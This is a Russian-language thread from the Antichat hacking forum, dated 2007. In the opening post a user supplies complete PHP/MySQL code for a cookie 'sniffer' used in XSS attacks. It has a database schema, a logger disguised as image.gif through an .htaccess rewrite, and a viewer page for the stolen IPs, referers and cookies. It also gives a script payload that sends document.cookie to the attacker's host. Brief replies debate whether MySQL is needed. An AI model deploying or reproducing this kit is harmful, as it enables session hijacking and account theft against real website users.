Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Sniffer _Pantera_ for Antichat (https://forum.antichat.xyz/showthread.php?t=41073)

_Pantera_ 28.05.2007 19:35
Sniffer _Pantera_ for Antichat
 
Введение

При изучении атак вида XSS я столкнулся с проблемой - у меня небыло снифера. Я искал готовый снифер в интернете, но ничего дельного не нашел. Пообщавшись с юзерами античата мне дали дельный совет - снифер лутьше написать самому. Я так и сделал. Писал на php+mysql.


Начнем

Для начала создадим базу данных с именем sniffer
а после таблицу data
Цитата:
CREATE TABLE `data` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`ip` TEXT NOT NULL ,
`referer` TEXT NOT NULL ,
`qu` TEXT NOT NULL ,
`cookie` TEXT NOT NULL
) ENGINE = MYISAM ;
Сразу после этого напишем config.php
PHP код:
<?php
  $dbhost "database";
  $dbuser "login";
  $dbpass "password";
  $dbname "sniffer";

  $db = @mysql_connect($dbhost$dbuser$dbpass);
  if (!$db) {
    exit ("<P>Сервер базы данных не доступен</P>" );
  }
  if (!@mysql_select_db($dbname$db)) {
    exit( "<P>База данных $dbname не доступна</P>" );
  }
?>
ps требует редактирования


Теперь создаем snif.php
PHP код:
<html>
<head>
<title>Sniffer _Pantera_ for Antichat</title>
</head>
<body>
<?
$ip UrlDecode(getenv('REMOTE_ADDR'));
$referer UrlDecode(getenv('HTTP_REFERER'));
$qu UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');


require_once("config.php");
$query "INSERT INTO `data` VALUES(NULL, '$ip', '$referer','$qu','$cookie')";
mysql_query($query$db);
mysql_close($db);
?>
</body>
</html>
ps Именно он будет добавлять записи в базу данных.

Теперь создадим .htaccess:
Цитата:
RewriteEngine On
RewriteRule image.gif snif.php
ps В папку с снифером поместите любой gif рисунок и переименуйте его в image.gif

И наконец создаем log.php
PHP код:
<html>
<head>
<title>Снифер _Pantera_ for Antichat</title>
</head>
<body>
<?php
include('config.php');
$query "SELECT * FROM `data` ORDER by `id` DESC";
$result mysql_query($query);

  while($perem mysql_fetch_array($result))
  {
echo "<TABLE WIDTH=100% BORDER=1><DIV style='margin-bottom: 15;'>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>ip</center></td><td>".$perem['ip']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>referer</center></td><td>".$perem['referer']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>query</center></td><td>".$perem['qu']."</td></tr>
<tr><td WIDTH=15% bgcolor=#FFCC33><center>cookie</center></td><td>".$perem['cookie']."</td></tr></table>";

  }

?>
</body>
</html>
ps Этот файл будет считывать данные из базы данных и выводить их на экран в обратном порядке.

Ну вот собственно и все. Осталось теперь залить эти все файлы на хостинг с поддержкой php+mysql и использовать.

Использовние
Простой вызов по ссылке:
<a href="http://site.ru/image.gif?test">жми тут</a>

Вызов как картинки:
<img src="http://site.ru/image.gif">

Вызов из скрипта:
<script>img = new Image(); img.src = "http://site.ru/image.gif?"+document.cookie;</script>

Заключение
Хочу сказать парочку слов в заключение. Снифер написал для себя, и оформил его по своему вкусу. Если вам он понравиться буду обновлять. Главное пишите каким бы вы его хотели видеть.
C уважением _Pantera_ (С)

}{0TT@БЬ)Ч 28.05.2007 19:38
а разве без mysql ни как?

_Pantera_ 28.05.2007 19:39
Я его писал на свой вкус, можно было сделать с txt-шником.

Knight_of_Darkness 28.05.2007 23:55
не знаю, по-моему мускуль в сниффере не нужен. ИМХО.
з.ы. рульная у тебя подпись, в точку.

GreenBear 28.05.2007 23:59
Цитата:
не знаю, по-моему мускуль в сниффере не нужен. ИМХО.
каждый дрочит как хочет (с)
так что тут дело вкуса )

Sn@k3 29.05.2007 00:22
Ещё один..... куда их хоть столько, пип, юзаем каника и все в поряде, .....
плин один и тот-же куск кода в разной разметке =\

http://forum.antichat.ru/thread41026.html


Время: 05:54